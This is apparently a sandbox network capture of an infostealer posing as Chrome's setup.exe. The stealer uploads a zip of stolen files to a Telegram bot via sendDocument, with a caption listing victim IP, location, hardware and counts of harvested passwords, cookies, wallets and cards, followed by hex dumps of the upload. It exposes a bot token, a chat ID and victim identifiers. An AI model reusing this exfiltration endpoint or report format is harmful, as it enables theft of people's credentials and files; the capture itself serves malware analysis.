                                                                                                      2023-09-07 14:42:18 UTC0OUTPOST /bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg/sendDocument?chat_id=-1001826179816&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20191.101.61.19%0ACountry:%20United%20States%0ACity:%20Las%20Vegas%0APostal:%2089101%0AISP:%20Cogent%20Communications%20-%20A174%0ATimezone:%20-07:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20VLSU3BRF%20(1280,%201024)%0AHWID:%204573883483855036%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Program%20Files\Google%20LLC\Google%20Chrome\setup.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9D%8C%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                                                                                      content-type: multipart/form-data; boundary=85897f56aee1e107-288ab59860bd3f6b-d74d75859e458c4f-4476a0ac9fbfa3e1
                                                                                                      content-length: 819905
                                                                                                      accept: */*
                                                                                                      host: api.telegram.org
                                                                                                      2023-09-07 14:42:18 UTC2OUTData Raw: 2d 2d 38 35 38 39 37 66 35 36 61 65 65 31 65 31 30 37 2d 32 38 38 61 62 35 39 38 36 30 62 64 33 66 36 62 2d 64 37 34 64 37 35 38 35 39 65 34 35 38 63 34 66 2d 34 34 37 36 61 30 61 63 39 66 62 66 61 33 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 48 85 27 57 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 48 85 27 57 00 00 00 00 00 00 00 00 00 00 00 00 08 00
                                                                                                      Data Ascii: --85897f56aee1e107-288ab59860bd3f6b-d74d75859e458c4f-4476a0ac9fbfa3e1Content-Disposition: form-data; name="document"; filename="[US]_191.101.61.19.zip"Content-Type: application/zipPKH'WAutofill/PKH'W
                                                                                                      2023-09-07 14:42:18 UTC16OUTData Raw: 5f f6 83 20 f1 40 92 b8 9f 6d b0 f9 d7 49 fe 3d e4 e0 f9 f9 b6 2f fa 50 de fb bd df 9b d6 1a f7 9b 7d e6 53 59 7d ce c3 b8 9f 00 db 5c 5a 25 8f fa ea db 38 36 0f fe e4 83 6f e2 f8 22 00 c0 5c 66 9e 1f 83 61 f1 39 4f e7 e8 b3 1e c2 fd ba 5a f9 ea af f9 1a 3e f1 4b bf 9f 17 4d f0 c2 d8 e6 85 b2 b9 4c e2 81 24 71 3f 49 dc cf 36 b6 01 90 84 c5 7f 2f f1 6c 12 cf e2 00 89 67 b1 79 16 09 49 5c 16 c1 f3 63 9b cb 6c 90 78 6e 92 b8 2c 93 e7 66 9b 17 95 24 fe 2d 6c f3 82 48 e2 7e b6 b9 4c c9 7f 0a 07 2f 12 25 ff 19 64 fe 5d 2c fe 7d 1c fc bb 84 f8 bf 4d fc 6b 49 e2 45 25 73 99 c5 0b 65 1e 40 e2 59 a2 f0 dc 24 81 03 00 db 3c 5f 36 97 49 dc 4f 12 ff 12 db 3c 90 24 ee 67 9b 17 46 12 cf cd 0a 9e 87 c4 bf 95 24 00 cc 15 52 e1 f9 b1 f8 37 93 c4 b3 58 3c 37 db bc c8 64 00
                                                                                                      Data Ascii: _ @mI=/P}SY}\Z%86o"\fa9OZ>KML$q?I6/lgyI\clxn,f$-lH~L/%d],}MkIE%se@Y$<_6IO<$gF$R7X<7d
                                                                                                      2023-09-07 14:42:18 UTC32OUTData Raw: 00 99 2b 94 3c 90 6d 00 64 9e 8b 79 61 6c 03 10 11 d8 e6 7e 92 00 b0 0d 80 25 5e 38 f3 1c 6c 9e 83 f9 3f 41 12 2f 0a db 3c 37 49 3c 90 24 ee 67 9b 17 c6 e2 df 49 3c 3f 92 78 6e b6 79 5e e6 0a f1 7c 45 80 cd b3 05 48 48 e2 5f cb 36 00 d8 bc 60 09 36 2f 98 79 4e e2 5f 4b 12 f7 13 85 e7 27 c5 15 21 9e 2f 09 80 90 b8 9f 6d 00 6c f3 a2 92 79 0e b6 f9 1f c7 06 9b cb 24 90 b8 9f 24 6c f3 1c 6c 5e 54 22 79 6e 92 78 61 6c 73 3f ab f0 5f 49 12 0f 64 9b e7 60 f3 1c 24 5e 18 49 fc 6b d8 e6 39 88 17 ce 06 09 00 24 fe c7 71 f0 2f 91 84 24 00 6c 63 9b 67 51 f2 ef e2 e0 f9 91 c4 8b c2 e2 0a 89 e7 14 3c 3f 92 b8 cc 01 80 c5 f3 90 c4 f3 08 f1 40 b6 79 7e 24 f1 1f 23 b9 22 78 0e 16 57 04 00 16 2f 1a 89 e7 60 73 99 c4 bf 8b 1b 97 49 3c 07 9b e7 21 f1 40 92 70 26 48 3c 0f 9b
                                                                                                      Data Ascii: +<mdyal~%^8l?A/<7I<$gI<?xny^|EHH_6`6/yN_K'!/mly$$ll^T"ynxals?_Id`$^Ik9$q/$lcgQ<?@y~$#"xW/`sI<!@p&H<
                                                                                                      2023-09-07 14:42:18 UTC48OUTData Raw: 32 2f 94 6d fe 4d 94 5c f5 bf 98 83 ff 4e 92 f8 d7 b0 cd 73 93 c4 fd 6c 73 3f 49 d8 e6 3f 11 e2 e6 d7 30 ff 91 6c 9e 45 82 9c 20 1b ca 35 4c 2b 00 88 0a 65 0e 75 86 4b e5 3f 44 9a 67 b1 79 6e 32 cf 97 c5 0b 27 f1 42 85 f8 ef 24 f3 42 d9 e6 df 27 79 0e 36 cf 29 78 a1 24 2e 13 cf 9f f9 97 d9 3c 8b c4 73 10 20 f1 1c 6c 90 f8 df 21 b9 22 f8 57 71 70 99 1b 2f 8c 24 ee 67 9b 67 b1 b9 2c c4 bf 8b c4 bf c8 e6 59 6c 9e 83 93 7f 0f f1 bc 6c f3 82 48 e2 81 c2 05 00 8b cb 52 5c 21 ae 90 78 20 99 e7 60 9b 17 46 12 2f 8c c5 7f 0a 49 00 48 c2 36 f7 b3 cd bf 86 24 fe 35 6c f3 af 21 f3 ef 62 f1 42 49 e2 85 72 f0 c2 48 c2 36 cf 8f 6d 88 c2 f3 b0 79 91 39 79 41 24 61 9b cb 94 fc 47 91 c4 fd 6c f3 7f 91 24 5e 14 4e f1 c2 48 e2 85 b1 f8 77 0a 9e 83 c4 0b 65 f3 9c 92 7f 0f 99
                                                                                                      Data Ascii: 2/mM\Nsls?I?0lE 5L+euK?Dgyn2'B$B'y6)x$.<s l!"Wqp/$gg,YllHR\!x `F/IH6$5l!bBIrH6my9yA$aGl$^NHwe
                                                                                                      2023-09-07 14:42:18 UTC64OUTData Raw: 57 b8 fd ec 2e ff 1b ed b0 cf a5 5b ff 92 ff 0c 3f f4 03 3f c8 bb bc db bb 02 f0 b4 5b 6f e3 a5 5f eb 6d 39 d2 9c 46 e1 bf 8a 24 2e 73 f0 fc d8 e6 45 a2 e4 f9 91 c4 65 0e fe 2d 2c 9e 29 78 16 89 e7 20 81 cd 0b 23 89 17 c6 00 02 1c a0 44 14 ac 44 0e 2c 20 0d 02 21 2c 90 81 10 32 58 20 89 fb d9 e6 5f 62 9b e7 94 40 22 07 56 22 07 a6 81 03 94 88 82 95 90 02 25 a4 80 06 0e 50 02 80 f9 17 c9 fc ab d8 e6 f9 91 c4 03 59 bc 70 12 cf c1 e6 bf 83 cc bf 9b 24 1e c8 36 56 70 99 c4 bf 89 1b ff 2e 2a fc af 62 f3 1c 24 fe 43 48 dc 4f 12 cf 2d a2 32 df 38 c6 7c e3 38 b3 c5 71 66 1b 3b cc 16 c7 29 a5 72 99 8d 01 6c 2e b3 31 80 cd 15 06 83 31 97 19 c0 00 3c f1 6f 7e 9e 7f 2b 8b ff 56 92 78 61 24 f1 c2 d8 46 12 f7 b3 8d 6d 00 24 f1 dc 6c 03 20 09 49 38 f9 77 b1 82 e7 20 f1
                                                                                                      Data Ascii: W.[??[o_m9F$.sEe-,)x #DD, !,2X _b@"V"%PYp$6Vp.*b$CHO-28|8qf;)rl.11<o~+Vxa$Fm$l I8w
                                                                                                      2023-09-07 14:42:18 UTC80OUTData Raw: 92 c4 fd 6c f3 a2 92 c4 fd 6c f3 a0 b7 9b f3 82 fc e2 c7 7d 23 8f bd e1 61 00 fc d8 9f fd 2a 9f f0 c3 5f c1 0b 72 eb 57 fc 0a 5f f8 5b df cd 0b f2 a9 af f3 de 7c e1 6f 7d 37 2f cc a7 be ce 7b 73 bf 63 0f 7e 59 f6 d8 e6 f9 91 c4 03 d9 e6 bf 92 24 00 6c f3 ef 21 0a 2f 8c 6d fe b5 24 f1 a2 b2 f8 f7 51 e1 3f 82 24 fe 35 6c f3 22 91 b8 2c 0a 0f 24 89 cb 2c 9e 9b 6d 9e 1f 49 3c 37 87 c0 e6 59 6c 90 78 91 a9 f0 40 92 f8 57 71 f0 1c 94 00 84 b9 cc 36 f7 b3 1b 10 d8 0d 39 b0 12 01 96 91 85 65 64 61 19 59 58 86 04 64 b0 40 06 0b 64 b0 00 83 1b 90 3c 5b f0 1f 23 79 20 49 3c 90 dd b8 a2 f2 df ce e6 39 48 3c 90 24 ee 67 1b 00 49 00 98 00 40 12 00 b6 b9 9f 24 ee 67 9b 07 92 04 80 c5 0b f5 e2 af f8 8e 3c 9b c1 5c f6 bb df fc ae 9c d8 99 73 b4 1a d9 98 77 bc f2 fb 7e 0f
                                                                                                      Data Ascii: ll}#a*_rW_[|o}7/{sc~Y$l!/m$Q?$5l",$,mI<7Ylx@Wq69edaYXd@d<[#y I<9H<$gI@$g<\sw~
                                                                                                      2023-09-07 14:42:18 UTC96OUTData Raw: 9b 48 5c 11 3c 8b cd f3 25 f1 2c 36 97 49 dc 4f 12 f7 b3 cd fd 24 61 9b ff 54 2a fc a7 b2 79 21 10 37 be b2 79 a1 c4 fd 24 f1 1f cd 2a fc 6b 48 e2 81 2c fe 43 c8 60 9b fb 85 79 0e 29 9e 93 b8 c2 bc c8 24 f1 dc 2c fe 75 6c 9e 83 f9 4f 25 89 07 92 c4 03 99 e0 85 b1 cd f3 23 09 00 d3 78 51 49 e2 b9 d9 e6 3f 83 24 00 6c f3 c2 88 c2 0b 63 9b 17 4a 09 80 24 9e 1f db bc 50 0e 9e 9b 24 5e 18 db bc 30 92 78 51 d9 e6 85 51 18 00 db bc a8 24 f1 22 73 f0 3f 99 6d 2e 53 f2 9f 41 14 5e 18 db fc 57 92 c4 03 59 fc c7 93 b8 9f 54 f8 8f 64 9b 17 85 24 00 4c f0 40 92 78 20 8b 17 ce e2 7e 92 78 6e 16 2f 94 cc 8b 28 90 c4 03 49 22 c5 bf 8b 09 5e 14 92 00 90 04 80 0c 16 a4 78 a6 00 12 a9 60 25 38 40 89 28 a0 04 07 0a 63 02 48 20 00 90 82 17 45 f2 9c 02 48 20 80 04 02 48 20 80
                                                                                                      Data Ascii: H\<%,6IO$aT*y!7y$*kH,C`y)$,ulO%#xQI?$lcJ$P$^0xQQ$"s?m.SA^WYTd$L@x ~xn/(I"^x`%8@(cH EH H
                                                                                                      2023-09-07 14:42:18 UTC112OUTData Raw: 20 2a cf 92 13 e4 c4 73 88 0a 51 21 2a 44 e5 b2 9c 20 27 c8 09 72 e2 5f 14 95 2b 82 cb 72 e4 b2 e8 b8 cc e6 32 4f 3c 87 e8 20 2a cf e2 89 cb a2 e3 59 72 84 9c 90 84 6d 9e 43 54 88 0e a2 42 54 b0 c1 0d 72 82 1c 01 40 15 24 00 e4 09 00 db bc c8 72 e2 59 a2 42 74 10 15 a2 f2 3c dc b8 4c e2 39 d8 fc 47 92 f9 37 b1 cd f3 23 89 17 85 6d 9e 9b 24 ee 67 f1 c2 d9 3c 8b c4 ff 38 2a 5c 66 f3 1c 24 9e 83 cd f3 23 55 1e c8 02 49 58 3c 5f 32 cf c3 36 0f 24 89 17 c4 36 ff 2a 21 fe 7b 24 97 a9 f0 9c 04 12 10 fc 97 90 78 e1 82 fb 49 e2 5f cb 0a 2e 93 f8 d7 90 04 80 6d 9e 45 02 40 12 f7 93 82 07 b2 78 1e 06 42 22 01 6c ae 08 90 78 b6 00 40 12 f7 33 80 82 cb 72 84 36 40 8e 00 a8 ce 00 30 e2 59 4a 0f 02 da 08 6d 0d 6d 40 0e 28 3d cf a3 f6 3c cb 34 40 1b 80 44 0e 5c 2b c4 1c
                                                                                                      Data Ascii: *sQ!*D 'r_+r2O< *YrmCTBTr@$rYBt<L9G7#m$g<8*\f$#UIX<_26$6*!{$xI_.mE@xB"lx@3r6@0YJmm@(=<4@D\+
                                                                                                      2023-09-07 14:42:18 UTC128OUTData Raw: fc 6b 48 e2 7e 16 e0 c0 e2 5f 26 71 99 cd 65 12 2f 88 24 20 00 30 cf 49 12 0f 64 05 cf 97 c4 65 36 2f 12 89 e7 26 09 23 fe 3d 24 61 1b 00 49 00 d8 06 40 12 26 f8 97 48 e2 f9 91 44 52 79 6e 92 b0 02 00 49 00 38 c4 73 b0 b9 4c 42 12 00 92 30 e2 39 a8 f0 40 56 80 c4 b3 38 00 90 04 80 24 00 24 01 60 f1 4c e2 f9 49 00 19 2c 02 03 02 8c 6d 64 c8 4c 50 82 03 94 dc 2f 0c b6 b1 1b 28 91 c1 36 a4 c1 0d d2 90 0d 6c 50 82 01 0c 06 94 80 b8 2c 13 94 3c 07 09 cc 65 92 78 4e e6 81 c4 73 4a 73 99 24 24 61 8b 07 32 81 24 ee e7 10 ff 5a 92 b8 9f 2d fe 3d 84 78 51 48 e2 b9 59 5c 66 f1 9c 24 20 f8 8f 20 09 00 49 00 d8 e6 7e 92 48 f3 7c 49 e2 45 61 82 17 2e 78 20 49 3c a7 e4 45 25 89 e7 96 0a 5e 28 15 9e 1f 49 bc 28 6c f3 9f 4b fc 9b d8 80 f9 17 49 3c 8b 0d 00 12 f7 13 c9 0b
                                                                                                      Data Ascii: kH~_&qe/$ 0Ide6/&#=$aI@&HDRynI8sLB09@V8$$`LI,mdLP/(6lP,<exNsJs$$a2$Z-=xQHY\f$ I~H|IEa.x I<E%^(I(lKI<
                                                                                                      2023-09-07 14:42:18 UTC144OUTData Raw: c4 73 b0 41 e2 59 6c 9e 45 02 9b cb 24 fe 4d 54 78 20 49 3c 90 25 1e 48 12 ff 91 6c 03 20 89 e7 26 89 24 78 61 24 01 60 f1 9c 1c 00 3c f4 8d cf 02 06 83 79 26 9b d7 79 f4 2b 72 ed ce 29 8e 2f b6 d9 3d da e7 87 fe f8 17 b9 cc 06 e0 6b df e3 53 79 ed 47 bf 02 db f3 4d 7e ec 4f 7f 85 4f f8 c1 2f 03 73 85 0d 80 01 0c cf f8 ba df e0 df ea 21 1f f7 86 00 dc fa bb 0f e2 5f 22 89 07 92 44 5a bc 50 51 78 a1 24 5e 18 49 bc 30 4e f1 1c 42 00 48 05 00 87 78 1e 12 2f 88 24 ae 10 00 26 b8 9f 24 9e 2d b8 22 79 6e b6 79 6e 92 78 be 94 3c 5f 0e ee 27 09 08 ee 67 1b 49 5c 11 00 24 57 48 02 c0 e2 39 29 78 0e 12 97 d9 5c 16 e2 32 15 9e 45 02 9b cb 24 ae 08 10 08 61 41 50 48 41 18 1c 22 32 48 81 24 2c 00 01 20 89 04 a4 02 80 24 2c 1e 20 79 20 99 67 09 c0 36 b2 01 40 09 0e 50
                                                                                                      Data Ascii: sAYlE$MTx I<%Hl &$xa$`<y&y+r)/=kSyGM~OO/s!_"DZPQx$^I0NBHx/$&$-"ynynx<_'gI\$WH9)x\2E$aAPHA"2H$, $, y g6@P
                                                                                                      2023-09-07 14:42:19 UTC160OUTData Raw: d9 00 b0 cd 73 93 84 49 fe 2b 48 02 c0 36 f7 93 84 6d fe 53 29 78 a1 6c 90 78 16 9b 67 91 40 e2 32 9b e7 20 f1 22 b1 40 e2 05 b2 79 91 48 fc 6f 24 89 17 85 24 00 6c f3 40 26 b8 9f 24 9e 9b c5 0b 27 f1 1f 41 12 0f 64 8b e7 20 21 89 e7 66 89 07 92 c4 bf 86 33 41 42 12 00 b6 79 20 49 3c 3f 92 00 48 82 7f 2d 49 3c 8b 0a 2f cc 43 de e8 3e c0 60 30 cf 64 03 80 b9 c2 c6 e6 0a 9b cb 6c 00 6c c0 06 00 73 85 0d 80 01 0c d1 17 ee f7 f4 af f8 55 00 1e f2 71 6f c8 0b f2 f4 af f8 55 ee f7 90 8f 7b 43 00 6e fd dd 87 20 89 67 91 00 b0 cd 15 01 80 24 1e c8 21 1e 48 12 0f 64 9b e7 26 89 fb 99 e0 7e 92 80 e0 81 1c e2 39 58 3c 90 82 e7 64 f1 1c 42 3c a7 e0 81 ac e4 85 11 85 7f 2f 49 dc cf 36 f7 93 44 2a 78 61 24 f1 c2 98 00 40 12 2f 8c c5 15 12 0f a4 e4 85 b2 c4 f3 23 09 00
                                                                                                      Data Ascii: sI+H6mS)xlxg@2 "@yHo$$l@&$'Ad !f3ABy I<?H-I</C>`0dllsUqoU{Cn g$!Hd&~9X<dB</I6D*xa$@/#
                                                                                                      2023-09-07 14:42:19 UTC176OUTData Raw: 00 b0 8d 6d 9e 45 bc 70 39 42 1b 60 1a b8 ac f6 a8 ce a0 f4 d0 06 d4 46 68 6b dc 46 28 33 28 73 9e a5 ad a1 0d 50 7a 5c 67 50 67 40 c2 b4 86 b6 e2 b2 ba 80 3a 43 12 4c 6b 98 46 3c ad a1 74 50 66 d0 cd a1 f4 48 c2 36 38 b8 9f 24 8c f9 57 93 b8 5f 44 25 c5 bf 9d 0b cf 57 88 07 92 c4 03 99 67 52 f2 1c 1c 3c 3f 92 b8 22 78 20 0b 90 78 0e 0e 24 01 60 f1 7c 49 02 84 6d 5e 18 49 bc 30 a2 70 45 00 49 2a 78 7e 24 01 60 9e 8b 92 e7 47 12 00 b6 41 e2 81 24 f1 6c 81 c5 0b 27 f1 fc 48 c2 16 0f 24 09 00 13 3c 90 24 1e 48 12 00 69 ae 90 f8 b7 50 09 9e 1f 8b cb 24 f1 02 39 b0 02 54 78 0e 12 f7 93 c4 15 e2 81 24 01 20 f3 1c 2c 2e b3 cd f3 63 9e 4b a9 bc 30 a2 00 60 f1 6c 12 cf 16 5c 26 9e 93 c4 65 09 48 20 9e 93 84 24 4c 70 59 88 2b 02 24 9e 45 02 82 67 0b 9e 43 04 08 30
                                                                                                      Data Ascii: mEp9B`FhkF(3(sPz\gPg@:CLkF<tPfH68$W_D%WgR<?"x x$`|Im^I0pEI*x~$`GA$l'H$<$HiP$9Tx$ ,.cK0`l\&eH $LpY+$EgC0
                                                                                                      2023-09-07 14:42:19 UTC192OUTData Raw: 79 be 6c 9e 25 27 9e 25 2a 94 1e 4a 07 00 6d 84 6c 3c 8f 1c 79 96 e8 78 0e 39 f2 7c 45 07 d1 41 a9 5c d6 26 c8 11 00 a2 e3 59 72 84 1c 79 be a2 83 e8 90 04 00 39 62 1b a2 83 52 21 3a 9e 9b 24 5e 18 f3 bc 24 f1 6c c1 bf 87 c5 bf 8f c4 ff 06 92 b8 9f 6d 00 b0 79 1e 12 57 04 2f 0a 49 bc 30 e6 39 49 e2 39 89 e7 c7 e2 32 49 3c 90 24 00 92 fb 55 9e bf e4 79 d8 3c 0f 37 00 24 f1 40 92 00 b0 cd fd 24 f1 dc ac 0e f3 9f 4f 12 0f 64 1b 00 49 d8 e6 7e 92 b8 9f 6d 1e 48 12 0f 24 89 c4 3c 07 15 2e b3 b8 2c c4 f3 23 71 99 6d ae 10 cf 29 b8 4c e2 8a 00 40 12 57 04 2f 92 08 ee 67 9b 67 b1 01 08 99 fb 49 e2 81 24 21 89 fb d9 e6 b9 99 11 00 db 5c 96 c6 36 b6 b9 2c 0d 36 02 ec 04 1b dc c0 06 25 20 20 81 00 37 70 80 12 1c a0 44 14 50 82 03 94 c8 81 95 c8 81 95 d8 06 40 12 0f
                                                                                                      Data Ascii: yl%'%*Jml<yx9|EA\&Yry9bR!:$^$lmyW/I09I92I<$Uy<7$@$OdI~mH$<.,#qm)L@W/ggI$!\6,6% 7pDP@
                                                                                                      2023-09-07 14:42:19 UTC208OUTData Raw: fd 24 71 3f 03 48 20 ae 90 80 e0 39 28 00 90 04 80 2d 2e 93 40 02 04 12 48 3c 07 07 f7 93 84 c5 f3 92 00 f1 dc 24 61 02 49 dc cf 04 f7 93 c4 0b 62 f1 6c 12 88 2b 24 2e 13 cf 49 e6 8a e0 39 38 b8 4c e2 32 05 48 dc 4f 04 c8 40 62 41 20 2c 2e b3 04 00 02 54 b8 4c e2 b2 10 48 00 48 82 08 cc 03 48 3c 90 24 24 51 24 00 24 61 9b fb d9 09 24 ce c4 36 6e 89 6d 94 06 c0 e3 c4 65 36 a4 c1 86 34 d8 5c e6 c6 b3 48 3c 07 89 7f 59 f0 dc 24 f1 a2 4b 5e 18 8b e7 25 f1 2f 72 f0 40 01 d8 e6 81 0c a0 04 40 0e 6c 03 80 0d e6 32 65 03 1b bb 21 03 4a c0 28 8d 69 e0 00 c0 36 22 b1 0d 36 a4 11 09 24 38 b1 8d dc b0 0d 36 d8 90 0d 48 c8 04 1b dc 20 0d 4a 68 13 22 b1 0d 4e c8 86 dc 20 0d 24 ce 04 27 b8 11 4e 6c 63 1b dc 20 0d 24 72 e2 36 22 27 22 21 4d ba a1 6c d8 06 1b 65 03 c0 36
                                                                                                      Data Ascii: $q?H 9(-.@H<$aIbl+$.I98L2HO@bA ,.TLHHH<$$Q$$a$6nme64\H<Y$K^%/r@@l2e!J(i6"6$86H Jh"N $'Nlc $r6"'"!Mle6
                                                                                                      2023-09-07 14:42:19 UTC224OUTData Raw: 40 69 20 48 9e bf 88 00 c0 0a 9e 1f bb 01 20 09 00 2b 00 f0 ef 7f 25 87 87 87 d8 e6 aa ab ae ba ea aa ab ae ba ea aa ab 5e 14 92 d8 d8 d8 20 3e fa 4f 78 81 5c 78 0e 21 9e 83 c4 15 c1 65 21 9e 83 c4 65 0e 5e 10 49 58 e2 39 48 3c 0f 09 a9 00 60 81 24 ee 67 71 85 83 67 91 00 c0 e6 59 24 9e c5 86 12 3c 37 49 dc cf 21 b0 01 40 02 00 1b 00 24 20 78 1e 12 2f 88 24 00 2c 9e 2f 49 3c 90 25 5e a8 10 f7 93 c4 03 49 c2 2a bc 30 16 cf 22 89 17 85 24 2c 9e 87 24 ee 97 e2 32 11 00 58 3c 8b 24 00 1c 82 14 97 09 90 40 02 40 12 16 97 49 e2 7e 0e f1 1c 24 ee 27 09 0b 90 00 40 80 04 80 24 00 24 63 81 6d 00 24 61 00 89 cb 64 00 24 61 00 01 12 84 79 16 25 c8 10 42 32 16 80 b9 2c 04 32 11 01 80 24 00 64 b0 20 10 92 88 80 00 6c 20 81 34 6e 8d 9c 1a b4 24 33 91 21 3d 91 99 88 42
                                                                                                      Data Ascii: @i H +%^ >Ox\x!e!e^IX9H<`$gqgY$<7I!@$ x/$,/I<%^I*0"$,$2X<$@@I~$'@$$cm$ad$ay%B2,2$d l 4n$3!=B
                                                                                                      2023-09-07 14:42:19 UTC240OUTData Raw: 5f 92 00 b0 78 a6 e0 85 92 78 16 89 e7 26 89 17 46 12 00 89 79 20 49 00 98 00 1b cc 15 4a 2e 4b f3 7c 29 79 a0 70 e1 81 6c f3 40 92 78 20 8b e7 61 9b e7 cb 06 73 99 24 9e af 10 16 e0 00 25 38 40 09 0e 2e 13 cf 94 5c 26 f1 1c 6c ee 27 f3 3c 02 61 71 45 08 80 e4 d9 c2 c1 73 4b 81 14 00 98 e7 22 40 02 02 64 c2 5c 66 9b e7 e6 10 61 48 81 24 9e 9b 6d 4a 29 00 58 20 09 42 00 48 22 79 a6 10 00 89 c1 e6 39 4c 89 78 36 4b 48 82 10 0e c1 34 41 00 12 48 10 01 21 00 08 03 0d 48 20 20 0c 0a 28 41 55 e0 10 92 30 20 12 95 a0 2b 95 a8 85 08 21 41 df 41 60 22 84 04 11 20 81 04 12 64 72 59 26 64 9a f4 44 66 92 99 34 1b 2b b0 8d 0c b6 91 84 24 0a 42 12 b3 be 07 40 e2 b2 30 b4 96 b4 d6 c8 4c 72 6a 48 42 12 99 30 4d 8d 71 9a b0 85 6d 4a e9 48 ae b0 40 06 0b 20 81 80 0c 0a 50
                                                                                                      Data Ascii: _xx&Fy IJ.K|)ypl@x as$%8@.\&l'<aqEsK"@d\faH$mJ)X BH"y9Lx6KH4AH!H (AU0 +!AA`" drY&dDf4+$B@0LrjHB0MqmJH@ P
                                                                                                      2023-09-07 14:42:19 UTC256OUTData Raw: 07 5f ff 95 6f cb 8d 00 77 fe 24 1f fb e1 df c7 d3 b9 df 6b f1 29 3f f5 d1 bc 22 cf f6 a7 5f fd 36 7c d1 ef f0 2c 0f 79 8f af e7 2b df f6 46 9e ed 4f f9 ea b7 f9 22 7e 87 fb 3d 84 f7 f8 fa af e4 6d 6f 04 f8 53 be fa 6d be 88 df e1 5f e3 21 bc c7 d7 7f 25 6f 7b 23 57 5d 75 d5 f3 b1 5e af 79 f7 77 7b 1f a6 69 e2 bf d2 cb bd fc 4b f3 e9 9f fe a9 00 7c df 8f fc 34 3f fc 17 1d 93 16 dc 6f c6 21 1f f2 ba 9b bc c9 1b bd 2e 00 df fd dd df c3 e9 d3 a7 78 f3 37 7f 73 f6 f6 f6 78 87 2f f8 73 fe b3 3c 72 e3 19 7c f5 a7 bf 27 a5 14 fe 27 91 c4 c6 c6 06 e5 ab 2e 61 1e 40 e2 5f 24 ae 90 78 7e 24 01 60 cc b3 48 e0 e0 59 24 00 10 40 80 04 80 24 ee 17 01 84 90 c1 82 40 40 22 09 80 cc 24 24 ee 67 1b db 64 26 b6 b9 9f 6d b0 c1 06 1b 6c 2e 93 b8 4c e2 32 09 24 00 0a 82 14 92
                                                                                                      Data Ascii: _ow$k)?"_6|,y+FO"~=moSm_!%o{#W]u^yw{iK|4?o!.x7sx/s<r|''.a@_$x~$`HY$@$@@"$$gd&ml.L2$
                                                                                                      2023-09-07 14:42:19 UTC272OUTData Raw: e4 3d be 9e af 7c db 1b f9 ff ed 4e 7e f2 63 3f 9c ef 7b 3a 2f 92 87 bc c7 d7 f3 95 6f 7b 23 57 5d 75 d5 55 57 bd 70 ef fe ee ef cd e1 c1 11 ff 1a 37 dc 70 2d df f0 8d 5f 07 c0 e3 9f f0 04 3e ff 7b ff 92 73 ed 3a 1e e8 9a 7a 0f ef ff 46 0f e6 b5 5e f3 55 01 78 f2 93 9f cc a7 7e ca 67 31 4d 13 cf ad d6 ca cb be dc 4b f1 7e ef f7 3e 5c 73 cd 35 3c d0 5d 77 dd c5 1f fd d1 1f f1 92 2f f9 92 3c e2 11 8f 00 e0 1d 3e e9 c7 d8 e3 14 ff 9d 3e f1 8d 2b af f7 3a af c9 7f 07 49 6c 6c 6c 10 5f bd 07 02 24 1e 48 12 b6 b9 9f 24 00 24 91 e2 0a 9b e7 61 f3 2c 45 50 0c 12 97 49 a0 04 0a 84 51 29 10 42 12 84 90 84 64 ac 02 4a 22 02 15 90 0a 92 91 04 80 04 0e c8 06 0a 2e b3 80 04 cb 04 22 02 6c 68 6d a2 35 03 49 44 20 89 cc 24 3d 71 3f c9 48 42 12 57 18 10 a6 22 15 24 23 09
                                                                                                      Data Ascii: =|N~c?{:/o{#W]uUWp7p-_>{s:zF^Ux~g1MK~>\s5<]w/<>>+:Illl_$H$$a,EPIQ)BdJ"."lhm5ID $=q?HBW"$#
                                                                                                      2023-09-07 14:42:19 UTC288OUTData Raw: 91 93 4e 41 57 44 45 14 09 c9 04 85 1a 50 95 14 81 08 52 20 09 09 2c 30 57 24 20 01 c1 65 99 30 4c d0 1a b4 84 34 b4 06 43 83 71 30 c3 d8 18 5a a3 25 0c eb 24 31 53 9a 29 1b ad 99 29 93 cc c4 2e b4 09 20 b0 8d d2 d8 c6 16 b6 b9 cc 01 80 14 3c 90 54 00 c8 4c 20 81 00 92 17 ce 48 01 18 10 cf 16 dc cf 00 12 00 10 00 20 c0 80 00 09 51 00 90 84 69 00 c8 09 40 06 10 22 dc 21 12 e7 9a ae 5d e2 11 d7 14 5e e9 e1 d7 72 43 85 df f9 a5 df e2 8f ff f4 ef 99 b2 20 5e ec 6d 0d 09 04 90 90 02 12 08 20 81 00 12 08 20 91 03 48 20 b0 f8 d7 93 78 0e 36 cf 8f 0c 16 90 06 01 06 c4 bf 9e c4 73 90 78 a1 6c fe 55 24 9e 83 cd 73 90 78 d1 04 90 40 f0 a2 90 04 80 6d 24 01 60 1b 00 49 00 d8 e6 bf 92 24 9e 9b 24 00 cc f3 23 2c c0 01 4a 5e 34 e6 39 89 17 89 03 00 49 3c 90 c5 f3 27 71
                                                                                                      Data Ascii: NAWDEPR ,0W$ e0L4Cq0Z%$1S)). <TL H Qi@"!]^rC ^m H x6sxlU$sx@m$`I$$#,J^49I<'q
